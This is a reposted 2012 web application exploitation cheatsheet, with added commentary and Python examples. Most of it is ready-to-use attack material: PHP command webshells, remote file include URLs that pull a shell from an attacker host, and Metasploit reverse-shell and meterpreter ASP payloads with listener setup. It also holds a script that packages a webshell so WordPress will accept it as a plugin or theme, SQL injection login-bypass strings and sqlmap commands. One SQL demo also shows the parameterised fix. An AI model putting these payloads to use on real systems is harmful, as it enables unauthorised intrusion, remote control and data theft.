Apr 19, 2012

Web Application exploitation - a cheatsheet By Tim Arneaud

If you want to get the full article, please go to the Source.


WebShell Backdoors
Minimal php command shells

file cmd.php reports it as plain PHP script text:

<?php system($_GET['cmd']) ?>

or (takes the parameter from GET, POST or cookie)

<?php system($_REQUEST['cmd']); ?>

Example usage via Remote File Include (RFI), where index.php passes the page parameter to include():

http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php

RFI only works with allow_url_include=On (and allow_url_fopen=On) on the target, and the attacker's host must serve cmd.php as raw text rather than executing it (host it without a PHP handler, or name it cmd.txt).

Null Bytes (%00) may also assist in some cases, e.g. when the application appends a suffix such as .php to the parameter; PHP before 5.3.4 stops reading the filename at the null byte:
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php%00


Encoding windows reverse command shell as asp

msfpayload windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-nc-port> R | msfencode -t asp -o <filename>.asp

(shell_reverse_tcp is a single-stage payload, so a plain listener such as nc -lvp <attacker-nc-port> catches it)

Encoding meterpreter in asp

msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> R | msfencode -t asp -o <filename>.asp

(meterpreter/reverse_tcp is staged: the .asp only carries the stager, so the listener must be multi/handler configured with the same payload. Newer Metasploit replaces msfpayload/msfencode with msfvenom: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> -f asp -o <filename>.asp)

------

attacker msfconsole:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST <attacker-ip>

set LPORT <attacker-multi-handler-port>

exploit


Specific Web applications

Joomla

Joomla default database configuration filename

<web-app-path>/configuration.php

Scanning Joomla! for plugins and versions

/pentest/web/scanners/joomscan/joomscan.pl -u <target-and-joomla-path>

/pentest/enumeration/web/cms-explorer  -url <target-and-joomla-path> -type joomla


WordPress

WordPress default database configuration filename

<web-app-path>/wp-config.php

WordPress default login page

<web-app-path>/wp-login.php

WordPress plugins

<web-app-path>/wp-content/plugins

Scanning WordPress for plugins and versions

/pentest/web/wpscan/wpscan.rb --url <target-and-wordpress-path> --enumerate [u|p|v|t]

/pentest/enumeration/web/cms-explorer -url <target-and-wordpress-path> -type wordpress

Newer WP: "Themes" (and plugins) can be uploaded as zip files by WP administrators:

mkdir wpx

vi wpx/cmd.php

cat wpx/cmd.php

<?php system($_GET['cmd']) ?>

zip -r wpx.zip wpx

upload wpx.zip via the admin interface (Appearance > Themes, or Plugins > Add New, then Upload)

Command execution access is via:

<web-app-path>/wp-content/themes/wpx/cmd.php?cmd=<command(s)>   (uploaded as a theme)

<web-app-path>/wp-content/plugins/wpx/cmd.php?cmd=<command(s)>   (uploaded as a plugin)

The file runs whether or not the theme/plugin is activated, because wp-content is served directly. Current WordPress rejects an archive that does not look like a theme or plugin: for a theme upload add a style.css carrying a "Theme Name:" header (plus an index.php); for a plugin upload add a .php file carrying a "Plugin Name:" header.

Older WP: Webshells can be added by editing existing files/themes via the web interface (Appearance > Editor) or by enabling file upload and permitting the required file extension (e.g. .php)
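The packaging step above, as an added example that is not code from the original cheatsheet: it builds the wpx.zip archive in memory and includes the header files that current WordPress installers check for (a "Plugin Name:" header in a top-level .php file for plugins; style.css with "Theme Name:" plus index.php for themes), then derives the URL the shell will answer on. The slug "wpx", the file names and the header-check helper are illustrative assumptions, not WordPress's own code.

```python
"""Package the page's minimal PHP webshell as a WordPress plugin or theme zip.

Added example, not code from the original page. A bare "wpx/cmd.php" archive
is rejected by current WordPress installers; this adds the files they look for.
Slug and file names are illustrative assumptions.
"""
import io
import re
import zipfile
from urllib.parse import quote

# Minimal command shell from the cheatsheet (deliberately unsafe: that is the point).
CMD_PHP = "<?php system($_GET['cmd']); ?>\n"


def build_archive(kind, slug="wpx", shell_name="cmd.php"):
    """Return zip bytes for kind 'plugin' or 'theme': the shell plus installer-required files."""
    if kind == "plugin":
        # The plugin installer scans top-level *.php files for a plugin header.
        extra = {f"{slug}/{slug}.php": f"<?php\n/*\nPlugin Name: {slug}\n*/\n"}
    elif kind == "theme":
        # The theme installer wants style.css with a Theme Name and, for a non-child theme, index.php.
        extra = {
            f"{slug}/style.css": f"/*\nTheme Name: {slug}\n*/\n",
            f"{slug}/index.php": "<?php // placeholder so the theme passes the installer check\n",
        }
    else:
        raise ValueError("kind must be 'plugin' or 'theme'")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in extra.items():
            zf.writestr(name, body)
        zf.writestr(f"{slug}/{shell_name}", CMD_PHP)
    return buf.getvalue()


def archive_names(archive):
    """List the members of a zip given as bytes."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.namelist()


def header_present(kind, archive):
    """Local pre-check approximating the installer's header test (an assumption, not WP's code)."""
    if kind == "plugin":
        target, pattern = ".php", r"^\s*\*?\s*Plugin Name:\s*\S"
    else:
        target, pattern = "style.css", r"^\s*\*?\s*Theme Name:\s*\S"
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for name in zf.namelist():
            # Only files directly inside the single top-level directory count.
            if name.count("/") == 1 and name.endswith(target):
                if re.search(pattern, zf.read(name).decode("utf-8", "replace"), re.M):
                    return True
    return False


def shell_url(base, kind, cmd, slug="wpx", shell_name="cmd.php"):
    """Where the dropped file is reachable: themes and plugins live in different wp-content dirs."""
    subdir = "plugins" if kind == "plugin" else "themes"
    return f"{base.rstrip('/')}/wp-content/{subdir}/{slug}/{shell_name}?cmd={quote(cmd, safe='')}"


if __name__ == "__main__":
    for kind in ("plugin", "theme"):
        data = build_archive(kind)
        with open(f"wpx-{kind}.zip", "wb") as fh:
            fh.write(data)
        print(kind, archive_names(data), header_present(kind, data))
    print(shell_url("http://<target-ip>/wp", "plugin", "id; uname -a"))
```

Run it to get wpx-plugin.zip and wpx-theme.zip; upload whichever matches the admin page you have access to, and note that the command is URL-encoded, so spaces and semicolons survive the query string.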


Cacti

Cacti default database configuration filename

<web-app-path>/include/config.php

DeV!L`z ClanPortal

DeV!L`z ClanPortal default database configuration filename

<web-app-path>/inc/mysql.php

Drupal

Drupal default database configuration filename

<web-app-path>/sites/default/settings.php

Scanning Drupal for modules and versions

/pentest/enumeration/web/cms-explorer -url <target-and-drupal-path> -type drupal

Timeclock
Timeclock default database configuration filename
<web-app-path>/db.php
 
SQL Terminators/Comments
MSSQL and MySQL:

<sql injected command>;--

(MySQL only treats -- as a comment when it is followed by whitespace, so send "-- " with a trailing space, or "--+" in a URL)

MySQL:

<sql injected command>;#


Login Pages Basic SQL injection

MSSQL (typically behind MS IIS/ASP):

' OR 1=1;--

' OR '1'='1';--

MySQL:

' OR 1=1-- (trailing space required)

' OR 1=1#

In the username field the comment is what drops the AND password = '...' clause; without it, AND binds tighter than OR and ' OR '1'='1 alone does not bypass. In the password field ' OR '1'='1 works on its own, because the OR comes after the AND clause.
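To see the terminator and precedence points from the SQL Terminators/Comments and Login Pages sections in action, here is an added example that is not part of the original cheatsheet. It runs the same payloads against a vulnerable string-concatenated login query and against its parameterised replacement, on an in-memory SQLite table. The users table, the constructed credentials and the login functions are assumptions for the demonstration; SQLite honours -- comments the same way MSSQL does, so the behaviour carries over to the concatenation case on those engines.

```python
"""Login bypass via SQL injection: vulnerable vs. parameterised, on in-memory SQLite.

Constructed example for this cheatsheet section; the table, rows and app logic
are assumptions, not code from the original page.
"""
import sqlite3

# Constructed sample credentials (legacy-style plaintext storage, so both fields are injectable).
USERS = [("alice", "S3cret!"), ("bob", "hunter2")]


def make_db():
    """Create the demo table and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def build_query(username, password):
    """The vulnerable query: attacker input concatenated straight into the SQL text."""
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(conn, username, password):
    """Return the first matching username, or None. Any returned row counts as a login."""
    row = conn.execute(build_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same logic with bound parameters: quotes and comments in the input stay data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # Username field with a comment: the password clause is dropped entirely.
    print(build_query("' OR 1=1--", "x"))
    print(login_vulnerable(db, "' OR 1=1--", "x"))          # a username: bypass
    # Username field without a comment: AND binds tighter than OR, so no bypass.
    print(login_vulnerable(db, "' OR '1'='1", "x"))         # None
    # Password field: the OR lands after the AND clause, so it bypasses without a comment.
    print(login_vulnerable(db, "nobody", "' OR '1'='1"))    # a username: bypass
    # Parameterised version: the same inputs are just strings.
    print(login_safe(db, "' OR 1=1--", "x"))                # None
    print(login_safe(db, "alice", "S3cret!"))               # alice
```

Against MySQL the first payload must be sent as "' OR 1=1-- " with the trailing space (or "' OR 1=1#"); MSSQL and SQLite accept the bare "--".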


SQLMap commands

cd /pentest/database/sqlmap
Retrieve SQL Banner, current database and current user; test if the user is the db administrator

./sqlmap.py -u "http://<target>/index.php?param1=1&param2=2&param3=3" -p <injectable-parameter> --banner --current-db --current-user --is-dba



Source: http://it-ovid.blogspot.com/2012/04/web-application-exploitation-cheatsheet.html
